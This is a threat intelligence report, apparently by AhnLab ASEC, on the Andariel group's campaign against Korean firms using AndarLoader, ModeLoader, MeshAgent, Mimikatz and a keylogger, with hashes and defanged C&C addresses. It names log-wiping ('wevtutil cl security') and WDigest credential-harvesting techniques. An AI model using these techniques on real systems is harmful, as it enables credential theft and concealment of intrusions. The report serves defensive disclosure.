AhnLab SEcurity intelligence Center (ASEC) recently discovered the Andariel group’s continuous attacks on Korean companies. It is notable that installations of MeshAgent were found in some cases. Threat actors often exploit MeshAgent along with other similar remote management tools because it offers diverse remote control features.
The Andariel group exploited Korean asset management solutions to install malware such as AndarLoader and ModeLoader, which are the malware used in the previous cases. Starting with Innorix Agent in the past, the group has been continually exploiting Korean asset management solutions to distribute their malware during the lateral movement phase [1] [2].
1. AndarLoader
The ASEC team previously introduced AndarLoader in the past blog article, “Analysis of Andariel’s New Attack Activities” [3]. AndarLoader looks similar to Andardoor found in attack cases that exploited Innorix Agent, but unlike Andardoor which has most of the backdoor features (executing commands received from the C&C server) implemented in binary, AndarLoader is a downloader that downloads executable data such as .NET assembly and runs it in the memory.
Command | Feature |
alibaba | Run downloaded .NET assembly |
Run downloaded .NET method | |
exit | Terminate |
vanish | Self-delete and terminate |
Table 1. AndarLoader’s command list
Unlike the previous type that was obfuscated using Dotfuscator tool, AndarLoader found this time was obfuscated using KoiVM. As strings for use are decrypted during the execution phase, strings identical to the ones in the past AndarLoader can be found. Note that the current AndarLoader uses the “sslClient” string when connecting with the C&C server like the AndarLoader found in previous attacks.
2. MeshAgent
MeshAgent can collect basic system information required for remote management and provides features such as power and account management, chat or message pop-up, file upload and download, and command execution. It also provides web-based remote desktop features such as RDP and VNC. Users typically use this tool to use and manage their systems remotely, but these are features good for the threat actors to abuse.
There have been actual cases in which threat actors used MeshAgent to remotely control their victims’ screens [4]. This is the first time the Andariel group used MeshAgent, and it was downloaded from the external source with the name “fav.ico”.
The malware was not collected, but the team found the following C&C server as the MeshAgent server was active at the time.
3. ModeLoader
ModeLoader is a JavaScript malware that the Andariel group has been using for a long time. Instead of being generated as a file, it is downloaded externally via Mshta and executed. One of our previous blog posted the behavior listed on an ASD log.
The threat actors mainly exploit asset management solutions to execute Mshta command that downloads ModeLoader. When the following command is run, ModeLoader is downloaded and executed via the Mshta process C&C, and it regularly attempts to establish communication with the C&C server.
ModeLoader is developed in JavaScript and obfuscated, but it provides a simple feature. It regularly connects to the C&C server (modeRead.php), receives Base64-encoded commands, executes them, and sends the results to the C&C server (modeWrite.php).
The threat actors appeared to have used ModeLoader to install additional malware from the outside. Using the command below, AndarLoader was installed as “SVPNClientW.exe” in %SystemDirectory% and executed.
> cmd.exe /c tasklist
> cmd.exe /c c:windowssystem32SVPN*
4. Other Malware Attack Cases
After using a backdoor such as AndarLoader and ModeLoader to take control of the infected systems, the threat actors installed Mimikatz and attempted to steal the credentials inside the systems. Since plain passwords that use the WDigest security package cannot be found in the latest Windows environment, the command that sets the UseLogonCredential registry key is found simultaneously. The threat actors also used AndarLoader to execute the “wevtutil cl security” command and delete security event logs of the infected systems.
The shared characteristic of the attacks that belong to the attack campaign found this time is that they are found along with a keylogger. The malware provides not only the keylogging feature but also clipboard logging, and it records the keylogged data and data copied to the clipboard in “C:UsersPublicgame.db.”
The Andariel group installed a backdoor like how Kimsuky group did, took control of the infected systems, and performed additional tasks to remotely take control of their victims’ screens. To establish remote control, they installed MeshAgent as mentioned above, but also used RDP in some cases, and the command to activate the RDP service was also found. Although files were not found, the threat actors are likely using fRPC in their attacks in an attempt to access infected systems located in private networks via RDP.
5. Conclusion
Along with Kimsuky and Lazarus, Andariel group is one of the threat actor groups who are most actively targeting South Korea. The group mainly attacked their victims in the early days to obtain information related to security, but their attacks eventually aimed for gaining financial profits. The Andariel group is known to use attacks such as spear phishing attacks and watering hole attacks, and exploit software vulnerabilities to kick-start the initial access. There have also been cases in which the group exploited installed software or utilized vulnerability attacks to distribute their malware.
Users must take extra caution when downloading attachments of emails from unknown sources or running executable files from unidentified websites. Corporate security administrators must upgrade the monitoring capacity of asset management solutions and apply updates if software security vulnerabilities are found. Users should also apply the latest patch for OS and programs such as internet browsers and update V3 to the latest version to prevent malware infection in advance.
File Detection
– Backdoor/JS.ModeLoader.SC197310 (2024.03.01.00)
– Trojan/Win.Generic.C5384741 (2023.02.19.01)
– Trojan/Win.KeyLogger.C5542383 (2023.11.16.01)
– Trojan/Win32.RL_Mimikatz.R366782 (2021.02.18.01)
Behavior Detection
– CredentialAceess/MDP.Mimikatz.M4367
IoC
MD5
– a714b928bbc7cd480fed85e379966f95 : AndarLoader (%SystemDirectory%SVPNClientW.exe)
– 4f1b1124e34894398aa423200a8ab894 : KeyLogger (%USERPROFILE%documentskerberos.tmp, %USERPROFILE%kl.exe, %SystemDirectory%dllhostsvc.exe)
– 2c69c4786ce663e58a3cc093c6d5b530 : ModeLoader
– 29efd64dd3c7fe1e2b022b7ad73a1ba5 : Mimikatz (%USERPROFILE%mimi.exe)
C&C URL
– privacy.hopto[.]org:443 : AndarLoader
– privatemake.bounceme[.]net:443 : AndarLoader
– 84.38.129[.]21 : MeshAgent
– hxxp://www.ipservice.kro[.]kr/index.php : ModeLoader
– hxxp://www.ipservice.kro[.]kr/view.php : ModeLoader
– hxxp://www.ipservice.kro[.]kr/modeRead.php : ModeLoader
– hxxp://panda.ourhome.o-r[.]kr/view.php : ModeLoader
– hxxp://panda.ourhome.o-r[.]kr/modeRead.php : ModeLoader
– hxxp://panda.ourhome.o-r[.]kr/modeView.php : ModeLoader
– hxxp://www.mssrv.kro[.]kr/view.php : ModeLoader
– hxxp://www.mssrv.kro[.]kr/modeView.php : ModeLoader
– hxxp://www.mssrv.kro[.]kr/modeRead.php : ModeLoader
– hxxp://www.mssrv.kro[.]kr/modeWrite.php : ModeLoader
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Source: https://asec.ahnlab.com/en/63192/